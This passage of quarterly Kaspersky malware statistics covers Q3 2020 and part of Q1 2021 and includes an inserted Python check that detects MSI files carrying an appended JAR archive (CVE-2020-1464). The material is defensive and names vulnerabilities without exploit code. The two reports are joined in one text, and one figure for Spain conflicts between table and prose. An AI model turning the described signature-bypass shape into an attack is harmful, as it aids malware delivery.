In Q3 2020, Kaspersky products and technologies protected 121,579 users against ransomware attacks.

_Number of unique users attacked by ransomware Trojans, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162058/malware-report-q3-2020_04-en.png>))_

### Attack geography

_Geography of attacks by ransomware Trojans, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162124/malware-report-q3-2020_05-en.png>))_

**Top 10 countries attacked by ransomware Trojans**

|    | **Country*** | **%**** |
|---|---|---|
| 1 | Bangladesh | 2.37 |
| 2 | Mozambique | 1.10 |
| 3 | Ethiopia | 1.02 |
| 4 | Afghanistan | 0.87 |
| 5 | Uzbekistan | 0.79 |
| 6 | Egypt | 0.71 |
| 7 | China | 0.65 |
| 8 | Pakistan | 0.52 |
| 9 | Vietnam | 0.50 |
| 10 | Myanmar | 0.46 |

_* Excluded are countries with relatively few Kaspersky users (under 50,000)._
_** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._

**Top 10 most common families of ransomware Trojans**

|    | **Name** | **Verdicts** | **%*** |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 18.77 |
| 2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 10.37 |
| 3 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 9.58 |
| 4 | (generic verdict) | Trojan-Ransom.Win32.Generic | 8.55 |
| 5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.37 |
| 6 | Stop | Trojan-Ransom.Win32.Stop | 5.89 |
| 7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.12 |
| 8 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 3.14 |
| 9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.44 |
| 10 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 1.69 |

_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._

## Miners

### Number of new modifications

In Q3 2020, Kaspersky solutions detected 3,722 new modifications of miners.

_Number of new miner modifications, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162152/malware-report-q3-2020_06-en.png>))_

### Number of users attacked by miners

In Q3, we detected attacks using miners on the computers of 440,041 unique users of Kaspersky products worldwide.
Whereas in the previous quarter the number of attacked users decreased, in this reporting period the situation was reversed: from July we saw a gradual rise in activity.

_Number of unique users attacked by miners, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162222/malware-report-q3-2020_07-en.png>))_

### Attack geography

_Geography of miner attacks, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162251/malware-report-q3-2020_08-en.png>))_

**Top 10 countries attacked by miners**

|    | **Country*** | **%**** |
|---|---|---|
| 1 | Afghanistan | 5.53 |
| 2 | Ethiopia | 3.94 |
| 3 | Tanzania | 3.06 |
| 4 | Rwanda | 2.58 |
| 5 | Uzbekistan | 2.46 |
| 6 | Sri Lanka | 2.30 |
| 7 | Kazakhstan | 2.26 |
| 8 | Vietnam | 1.95 |
| 9 | Mozambique | 1.76 |
| 10 | Pakistan | 1.57 |

_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._
_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._

## Vulnerable applications used by cybercriminals during cyberattacks

According to our statistics, vulnerabilities in the Microsoft Office suite continue to lead: in Q3, their share amounted to 71% of all identified vulnerabilities. Users worldwide are in no rush to update the package, putting their computers at risk of infection. Although our products protect against the exploitation of vulnerabilities, we strongly recommend the timely installation of patches, especially security updates.

First place in this category of vulnerabilities goes to [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which allows a malicious script to be embedded in an OLE object placed inside an Office document.
Almost on a par in terms of popularity is the vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), exploits for which use a stack overflow error in the Equation Editor component. [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) likewise remain popular.

_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162317/malware-report-q3-2020_09-en.png>))_

The share of vulnerabilities in Internet browsers increased by 3 p.p. this quarter to 15%. One of the most-talked-about browser vulnerabilities was [CVE-2020-1380](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1380>) — a use-after-free error in the jscript9.dll library of the current version of the Internet Explorer 9+ scripting engine. This same vulnerability was spotted in [the Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>) targeted attack.

Also in Q3, researchers discovered the critical vulnerability [CVE-2020-6492](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-6492>) in the WebGL component of Google Chrome. Theoretically, it can be used to execute arbitrary code in the context of the program. The similar vulnerability [CVE-2020-6542](<https://nvd.nist.gov/vuln/detail/CVE-2020-6542>) was later found in the same component.
Use-after-free vulnerabilities were detected in other components too: Task Scheduler ([CVE-2020-6543](<https://nvd.nist.gov/vuln/detail/CVE-2020-6543>)), Media ([CVE-2020-6544](<https://nvd.nist.gov/vuln/detail/CVE-2020-6544>)) and Audio ([CVE-2020-6545](<https://nvd.nist.gov/vuln/detail/CVE-2020-6545>)).

In another browser, Mozilla Firefox, three critical vulnerabilities, [CVE-2020-15675](<https://nvd.nist.gov/vuln/detail/CVE-2020-15675>), [CVE-2020-15674](<https://nvd.nist.gov/vuln/detail/CVE-2020-15674>) and [CVE-2020-15673](<https://nvd.nist.gov/vuln/detail/CVE-2020-15673>), related to incorrect memory handling, were detected, also potentially leading to arbitrary code execution in the system.

In the reporting quarter, the vulnerability [CVE-2020-1464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1464>), used to bypass scans of malicious files delivered to user systems, was discovered in Microsoft Windows. An error in the cryptographic code made it possible for an attacker to insert a malicious JAR archive inside a correctly signed MSI file, circumvent security mechanisms, and compromise the system.
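A defender-side file check for the layout behind CVE-2020-1464 described above, added here as an example and not code from the report or from Kaspersky: it looks for a ZIP (JAR) archive appended after an OLE compound file, the container format MSI uses, which is exactly the shape a signed MSI with a trailing JAR takes. The function names and the constructed sample input are this example's own assumptions.

```python
"""Added example: detect an MSI (OLE compound file) that has a ZIP/JAR archive
appended after the signed container, the file shape abused by CVE-2020-1464.
The sample "MSI" built below is only a CFB header plus padding (constructed)."""
import io
import struct
import zipfile

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE2 compound file header (MSI)
EOCD_SIG = b"PK\x05\x06"                          # ZIP end-of-central-directory
LFH_SIG = b"PK\x03\x04"                           # ZIP local file header
EOCD_LEN = 22                                     # EOCD size without comment
EOCD_SCAN = EOCD_LEN + 0xFFFF                     # ZIP comment can be 65535 bytes


def find_zip(data):
    """Locate a ZIP archive that ends at the end of `data`.
    Returns (offset_of_archive_start, member_names) or None."""
    eocd_pos = data.rfind(EOCD_SIG, max(0, len(data) - EOCD_SCAN))
    if eocd_pos < 0:
        return None
    fields = struct.unpack("<4sHHHHIIH", data[eocd_pos:eocd_pos + EOCD_LEN])
    cd_size, cd_offset, comment_len = fields[5], fields[6], fields[7]
    if eocd_pos + EOCD_LEN + comment_len != len(data):
        return None  # bytes after the EOCD record: not a clean archive tail
    # cd_offset is relative to the archive start, and the central directory
    # ends where the EOCD begins, so this recovers the archive's true start
    # even when arbitrary data (here, the MSI) is prepended.
    zip_start = eocd_pos - cd_size - cd_offset
    if zip_start < 0 or data[zip_start:zip_start + 4] != LFH_SIG:
        return None
    with zipfile.ZipFile(io.BytesIO(data)) as zf:  # zipfile tolerates a prefix
        return zip_start, zf.namelist()


def classify(data):
    """'msi_with_appended_archive' is the CVE-2020-1464 shape: the container
    at offset 0 is what gets signature-checked, the trailing archive is not."""
    is_cfb = data.startswith(CFB_MAGIC)
    found = find_zip(data)
    if is_cfb and found and found[0] > 0:
        zip_start, names = found
        return {"verdict": "msi_with_appended_archive", "zip_offset": zip_start,
                "members": names, "jar_like": "META-INF/MANIFEST.MF" in names}
    if is_cfb:
        return {"verdict": "plain_cfb"}
    if found and found[0] == 0:
        return {"verdict": "plain_zip"}
    return {"verdict": "other"}


def build_sample(with_jar):
    """Constructed input: a 512-byte CFB-style header sector, optionally with a
    tiny inert JAR appended. Not a real installer and not executable content."""
    fake_msi = CFB_MAGIC + b"\x00" * (512 - len(CFB_MAGIC))
    if not with_jar:
        return fake_msi
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("Placeholder.class", "constructed placeholder, not bytecode")
    return fake_msi + buf.getvalue()


if __name__ == "__main__":
    print(classify(build_sample(True)))   # flagged, archive starts at 512
    print(classify(build_sample(False)))  # plain CFB container, nothing appended
```

The same trailer scan applies to any signed container, since Authenticode-style signatures cover the parsed structure rather than the raw file tail.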
Also detected were vulnerabilities that could potentially be used to compromise a system with different levels of privileges:

 * [CVE-2020-1554](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1554>), [CVE-2020-1492](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1492>), [CVE-2020-1379](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1379>), [CVE-2020-1477](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1477>) and [CVE-2020-1525](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1525>) in the Windows Media Foundation component;
 * [CVE-2020-1046](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1046>), detected in the .NET platform, can be used to run malicious code with administrator privileges;
 * [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>), a vulnerability in the code for processing Netlogon Remote Protocol requests that could allow an attacker to change any user credentials.

Among network-based attacks, those involving EternalBlue exploits and other vulnerabilities from the Shadow Brokers suite remain popular. Also common are brute-force attacks on Remote Desktop Services and Microsoft SQL Server, and via the SMB protocol. In addition, the already mentioned critical vulnerability [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>), also known as Zerologon, is network-based. This error allows an intruder in the corporate network to impersonate any computer and change its password in Active Directory.

## Attacks on macOS

Perhaps this quarter's most interesting find was [EvilQuest](<https://objective-see.com/blog/blog_0x59.html>), also known as Virus.OSX.ThifQseut.a. It is a self-replicating piece of ransomware, that is, a full-fledged virus.
The last such malware for macOS was detected 13 years ago, since which time this class of threats has been considered irrelevant for this platform.

**Top 20 threats for macOS**

|    | Verdict | %* |
|---|---|---|
| 1 | Monitor.OSX.HistGrabber.b | 14.11 |
| 2 | AdWare.OSX.Pirrit.j | 9.21 |
| 3 | AdWare.OSX.Bnodlero.at | 9.06 |
| 4 | Trojan-Downloader.OSX.Shlayer.a | 8.98 |
| 5 | AdWare.OSX.Bnodlero.ay | 6.78 |
| 6 | AdWare.OSX.Pirrit.ac | 5.78 |
| 7 | AdWare.OSX.Ketin.h | 5.71 |
| 8 | AdWare.OSX.Pirrit.o | 5.47 |
| 9 | AdWare.OSX.Cimpli.k | 4.79 |
| 10 | AdWare.OSX.Ketin.m | 4.45 |
| 11 | Hoax.OSX.Amc.d | 4.38 |
| 12 | Trojan-Downloader.OSX.Agent.j | 3.98 |
| 13 | Trojan-Downloader.OSX.Agent.h | 3.58 |
| 14 | AdWare.OSX.Pirrit.gen | 3.52 |
| 15 | AdWare.OSX.Spc.a | 3.18 |
| 16 | AdWare.OSX.Amc.c | 2.97 |
| 17 | AdWare.OSX.Pirrit.aa | 2.94 |
| 18 | AdWare.OSX.Pirrit.x | 2.81 |
| 19 | AdWare.OSX.Cimpli.l | 2.78 |
| 20 | AdWare.OSX.Bnodlero.x | 2.64 |

_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._

Among the adware modules and their Trojan downloaders in the macOS threat rating for Q3 2020 was Hoax.OSX.Amc.d.
Known as Advanced Mac Cleaner, this is a typical representative of the class of programs that first intimidate the user with system errors or other issues on the computer, and then ask for money to fix them.

### Threat geography

_Geography of threats for macOS, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162347/malware-report-q3-2020_10-en.png>))_

**Top 10 countries by share of attacked users**

|    | **Country*** | **%**** |
|---|---|---|
| 1 | Spain | 6.20% |
| 2 | France | 6.13% |
| 3 | India | 5.59% |
| 4 | Canada | 5.31% |
| 5 | Brazil | 5.23% |
| 6 | USA | 5.19% |
| 7 | Mexico | 4.98% |
| 8 | Great Britain | 4.37% |
| 9 | China | 4.25% |
| 10 | Italy | 4.19% |

_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 5000)._
_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._

Spain (6.29%) and France (6.13%) were the leaders by share of attacked users. They were followed by India (5.59%) in third place, up from fifth in the last quarter.
As for detected macOS threats, the Shlayer Trojan consistently holds a leading position in countries in this Top 10 list.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3 2020, the share of devices whose IP addresses were used for Telnet attacks on Kaspersky traps increased by 4.5 p.p.\n\n| \n---|--- \nTelnet | 85.34% \nSSH | 14.66% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q3 2020_\n\nHowever, the distribution of sessions from these same IPs in Q3 did not change significantly: the share of operations using the SSH protocol rose by 2.8 p.p.\n\n| \n---|--- \nTelnet | 68.69% \nSSH | 31.31% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2020_\n\nNevertheless, Telnet still dominates both by number of attacks from unique IPs and in terms of further communication with the trap by the attacking party.\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162417/malware-report-q3-2020_11-en.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky Telnet traps**\n\n**Country** | **%*** \n---|--- \nIndia | 19.99 \nChina | 15.46 \nEgypt | 9.77 \nBrazil | 7.66 \nTaiwan, Province of China | 3.91 \nRussia | 3.84 \nUSA | 3.14 \nIran | 3.09 \nVietnam | 2.83 \nGreece | 2.52 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\nIn Q3, India (19.99%) was the location of the highest number of devices that attacked Telnet traps. China (15.46%), having ranked first in the previous quarter, moved down a notch, despite its share increasing by 2.71 p.p. 
Egypt (9.77%) took third place, up by 1.45 p.p.\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162445/malware-report-q3-2020_12-en.png>))_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**\n\n**Country** | **%*** \n---|--- \nChina | 28.56 \nUSA | 14.75 \nGermany | 4.67 \nBrazil | 4.44 \nFrance | 4.03 \nIndia | 3.48 \nRussia | 3.19 \nSingapore | 3.16 \nVietnam | 3.14 \nSouth Korea | 2.29 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\nIn Q3, as before, China (28.56%) topped the leaderboard. Likewise, the US (14.75%) retained second place. Vietnam (3.14%), however, having taken bronze in the previous quarter, fell to ninth, ceding its Top 3 position to Germany (4.67%).\n\n**Threats loaded into traps**\n\n**Verdict** | **%*** \n---|--- \nBackdoor.Linux.Mirai.b | 38.59 \nTrojan-Downloader.Linux.NyaDrop.b | 24.78 \nBackdoor.Linux.Mirai.ba | 11.40 \nBackdoor.Linux.Gafgyt.a | 9.71 \nBackdoor.Linux.Mirai.cw | 2.51 \nTrojan-Downloader.Shell.Agent.p | 1.25 \nBackdoor.Linux.Gafgyt.bj | 1.24 \nBackdoor.Linux.Mirai.ad | 0.93 \nBackdoor.Linux.Mirai.cn | 0.81 \nBackdoor.Linux.Mirai.c | 0.61 \n \n_* Share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. 
Cybercriminals create such sites on purpose; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._

### Countries that are sources of web-based attacks: Top 10

_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._

_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._

In Q3 2020, Kaspersky solutions blocked **1,416,295,227** attacks launched from online resources located across the globe. **456,573,467** unique URLs were recognized as malicious by Web Anti-Virus.

_Distribution of web attack sources by country, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162516/malware-report-q3-2020_13-en.png>))_

### Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the share of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Vietnam | 8.69 |
| 2 | Bangladesh | 7.34 |
| 3 | Latvia | 7.32 |
| 4 | Mongolia | 6.83 |
| 5 | France | 6.71 |
| 6 | Moldova | 6.64 |
| 7 | Algeria | 6.22 |
| 8 | Madagascar | 6.15 |
| 9 | Georgia | 6.06 |
| 10 | UAE | 5.98 |
| 11 | Nepal | 5.98 |
| 12 | Spain | 5.92 |
| 13 | Serbia | 5.87 |
| 14 | Montenegro | 5.86 |
| 15 | Estonia | 5.84 |
| 16 | Qatar | 5.83 |
| 17 | Tunisia | 5.81 |
| 18 | Belarus | 5.78 |
| 19 | Uzbekistan | 5.68 |
| 20 | Myanmar | 5.55 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._

_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._

On average, 4.58% of Internet user computers worldwide experienced at least one **Malware-class** attack.

_Geography of web-based malware attacks, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162544/malware-report-q3-2020_14-en.png>))_

## Local threats

_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._

In Q3 2020, our File Anti-Virus detected **87,941,334** malicious and potentially unwanted objects.

### Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Afghanistan | 49.27 |
| 2 | Turkmenistan | 45.07 |
| 3 | Myanmar | 42.76 |
| 4 | Tajikistan | 41.16 |
| 5 | Ethiopia | 41.15 |
| 6 | Bangladesh | 39.90 |
| 7 | Burkina Faso | 37.63 |
| 8 | Laos | 37.26 |
| 9 | South Sudan | 36.67 |
| 10 | Uzbekistan | 36.58 |
| 11 | Benin | 36.54 |
| 12 | China | 35.56 |
| 13 | Sudan | 34.74 |
| 14 | Rwanda | 34.40 |
| 15 | Guinea | 33.87 |
| 16 | Vietnam | 33.79 |
| 17 | Mauritania | 33.67 |
| 18 | Tanzania | 33.65 |
| 19 | Chad | 33.58 |
| 20 | Burundi | 33.49 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._

_Geography of local infection attempts, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162613/malware-report-q3-2020_15-en.png>))_

Overall, 16.40% of user computers globally faced at least one **Malware-class** local threat during Q3.

The figure for Russia was 18.21%.

_Source: "IT threat evolution Q3 2020. Non-mobile statistics", Securelist, published 2020-11-20, <https://securelist.com/it-threat-evolution-q3-2020-non-mobile-statistics/99404/>_

_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._

## Quarterly figures

According to Kaspersky Security Network, in Q1 2021:

 * Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources across the globe.
 * 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus components.
 * Attempts to run malware designed to steal money via online access to bank accounts were stopped on the computers of 118,099 users.
 * Ransomware attacks were defeated on the computers of 91,841 unique users.
 * Our File Anti-Virus detected 77,415,192 unique malicious and potentially unwanted objects.

## Financial threats

### Financial threat statistics

At the end of last year, the number of users attacked by malware designed to steal money from bank accounts gradually decreased, a trend that continued in Q1 2021. This quarter, in total, Kaspersky solutions blocked this type of malware on the computers of 118,099 unique users.

_Number of unique users attacked by financial malware, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110545/01-en-malware-report-q1-2021-pc.png>))_

**Attack geography**

_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._

_Geography of financial malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110629/02-en-malware-report-q1-2021-pc.png>))_

**Top 10 countries by share of attacked users**

| | Country* | %** |
|---|---|---|
| 1 | Turkmenistan | 6.3 |
| 2 | Tajikistan | 5.3 |
| 3 | Afghanistan | 4.8 |
| 4 | Uzbekistan | 4.6 |
| 5 | Paraguay | 3.2 |
| 6 | Yemen | 2.1 |
| 7 | Costa Rica | 2.0 |
| 8 | Sudan | 2.0 |
| 9 | Syria | 1.5 |
| 10 | Venezuela | 1.4 |

_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._
_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._

As before, the most widespread family of bankers in Q1 was ZeuS/Zbot (30.8%). Second place was taken by the CliptoShuffler family (15.9%), and third by Trickster (7.5%). All in all, more than half of all attacked users encountered these families.
The notorious banking Trojan Emotet (7.4%) was deprived of its infrastructure this quarter as a result of a [joint operation](<https://www.europol.europa.eu/newsroom/news/world's-most-dangerous-malware-emotet-disrupted-through-global-action>) by Europol, the FBI and other law enforcement agencies, and its share predictably collapsed.

**Top 10 banking malware families**

| | Name | Verdicts | %* |
|---|---|---|---|
| 1 | Zbot | Trojan.Win32.Zbot | 30.8 |
| 2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.9 |
| 3 | Trickster | Trojan.Win32.Trickster | 7.5 |
| 4 | Emotet | Backdoor.Win32.Emotet | 7.4 |
| 5 | RTM | Trojan-Banker.Win32.RTM | 6.6 |
| 6 | Nimnul | Virus.Win32.Nimnul | 5.1 |
| 7 | Nymaim | Trojan.Win32.Nymaim | 4.7 |
| 8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.8 |
| 9 | Danabot | Trojan-Banker.Win32.Danabot | 2.9 |
| 10 | Neurevt | Trojan.Win32.Neurevt | 2.2 |

_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._

## Ransomware programs

### Quarterly trends and highlights

**New additions to the ransomware arsenal**

Last year, the SunCrypt and RagnarLocker ransomware groups adopted new scare tactics. If the victim organization is slow to pay up, even though its files are encrypted and some of its confidential data has been stolen, the attackers additionally threaten to carry out a DDoS attack. In Q1 2021, these two groups were joined by a third, Avaddon. Besides publishing stolen data, the ransomware operators said on their website that the victim would be subjected to a DDoS attack until it reached out to them.

REvil (aka Sodinokibi) is another group looking to increase its extortion leverage. In addition to DDoS attacks, it has [added](<https://twitter.com/3xp0rtblog/status/1368149692383719426>) spam and calls to clients and partners of the victim company to its toolbox.

**Attacks on vulnerable Exchange servers**

[Serious vulnerabilities were recently discovered](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) in the Microsoft Exchange mail server, allowing [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Ransomware distributors wasted no time in exploiting these vulnerabilities; to date, this infection vector has been seen in use by the Black Kingdom and DearCry families.

**Publication of keys**

The developers of the Fonix (aka XINOF) ransomware ceased distributing their Trojan and posted the master key online for decrypting affected files. We took this key and created a [decryptor](<https://www.kaspersky.com/blog/fonix-decryptor/38646/>) that anyone can use. The developers of another strain of ransomware, Ziggy, not only [published](<https://www.bleepingcomputer.com/news/security/ziggy-ransomware-shuts-down-and-releases-victims-decryption-keys/>) the keys for all victims, but also announced their [intention](<https://www.bleepingcomputer.com/news/security/ransomware-admin-is-refunding-victims-their-ransom-payments/>) to return the money to everyone who paid up.

**Law enforcement successes**

Law enforcement agencies under the US Department of Justice [seized](<https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware>) dark web resources used by NetWalker (aka Mailto) ransomware affiliates, and also brought charges against one of the alleged actors.

French and Ukrainian law enforcers worked together to trace payments made through the Bitcoin ecosystem to Egregor ransomware distributors. The joint investigation resulted in the [arrest](<https://www.bleepingcomputer.com/news/security/egregor-ransomware-affiliates-arrested-by-ukrainian-french-police/>) of several alleged members of the Egregor gang.

In South Korea, a suspect in the GandCrab ransomware operation was [arrested](<https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-affiliate-arrested-for-phishing-attacks/>) (this family ceased active distribution back in 2019).

### Number of new modifications

In Q1 2021, we detected seven new ransomware families and 4,354 new modifications of this malware type.

_Number of new ransomware modifications, Q1 2020 – Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110702/03-en-ru-es-malware-report-q1-2021-pc.png>))_

### Number of users attacked by ransomware Trojans

In Q1 2021, Kaspersky products and technologies protected 91,841 users from ransomware attacks.

_Number of unique users attacked by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110733/04-en-malware-report-q1-2021-pc.png>))_

### Attack geography

_Geography of attacks by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110802/05-en-malware-report-q1-2021-pc.png>))_

**Top 10 countries attacked by ransomware Trojans**

| | Country* | %** |
|---|---|---|
| 1 | Bangladesh | 2.31% |
| 2 | Ethiopia | 0.62% |
| 3 | Greece | 0.49% |
| 4 | Pakistan | 0.49% |
| 5 | China | 0.48% |
| 6 | Tunisia | 0.44% |
| 7 | Afghanistan | 0.42% |
| 8 | Indonesia | 0.38% |
| 9 | Taiwan, Province of China | 0.37% |
| 10 | Egypt | 0.28% |

_* Excluded are countries with relatively few Kaspersky users (under 50,000)._
_** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._

### Top 10 most common families of ransomware Trojans

| | Name | Verdicts | %* |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.37% |
| 2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 12.01% |
| 3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 9.31% |
| 4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 8.45% |
| 5 | (generic verdict) | Trojan-Ransom.Win32.Agent | 7.36% |
| 6 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom, Virus.Win32.PolyRansom | 3.78% |
| 7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.93% |
| 8 | Stop | Trojan-Ransom.Win32.Stop | 2.79% |
| 9 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.17% |
| 10 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.85% |

_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._

## Miners

### Number of new modifications

In Q1 2021, Kaspersky solutions detected 23,894 new modifications of miners. And though January and February passed off relatively calmly, March saw a sharp rise in the number of new modifications — more than fourfold compared to February.

_Number of new miner modifications, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110831/06-en-malware-report-q1-2021-pc.png>))_

### Number of users attacked by miners

In Q1, we detected attacks using miners on the computers of 432,171 unique users of Kaspersky products worldwide. Although this figure has been rising for three months, it is premature to talk about a reversal of last year's trend, whereby the number of users attacked by miners actually fell.
For now, we can tentatively assume that the growth in cryptocurrency prices, in particular bitcoin, has attracted the attention of cybercriminals and returned miners to their toolkit.

_Number of unique users attacked by miners, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111053/07-en-malware-report-q1-2021-pc.png>))_

### Attack geography

_Geography of miner attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111128/08-en-malware-report-q1-2021-pc.png>))_

**Top 10 countries attacked by miners**

| | Country* | %** |
